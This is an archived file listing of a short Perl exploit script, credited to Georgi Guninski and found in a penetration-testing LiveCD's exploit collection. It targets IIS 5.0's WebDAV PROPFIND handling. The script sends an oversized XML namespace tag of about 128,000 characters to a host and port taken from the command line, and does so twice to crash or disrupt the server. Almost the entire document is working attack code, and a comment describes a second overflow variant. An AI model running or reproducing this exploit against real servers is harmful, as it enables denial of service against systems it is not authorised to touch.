home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / vv5.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  1KB  |  39 lines

---

1. #!/usr/bin/perl 
2. # Written by Georgi Guninski 
3. use IO::Socket; 
4.  
5. print "IIS 5.0 propfind\n"; 
6.  
7. $port = @ARGV[1]; 
8. $host = @ARGV[0]; 
9.   
10.  
11. sub vv() 
12. { 
13.  
14. $ll=$_[0]; #length of buffer 
15. $ch=$_[1]; 
16. $over=$ch x $ll; #string to overflow 
17.  
18. $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; 
19. #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n"; 
20. # ^^^^ This is another issue and also works with length ~>65000 
21.   
22.  
23. $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n"; 
24. $l=length($xml); 
25. $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; 
26. syswrite($socket,$req,length($req)); 
27. print "."; 
28. $socket->read($res,300); 
29. #print "r=".$res; 
30. close $socket; 
31. } 
32.   
33.  
34. do vv(128008,"V"); # may need to change the length 
35. sleep(1); 
36. do vv(128008,"V"); 
37. print "Done.\n"; 
38.  
39.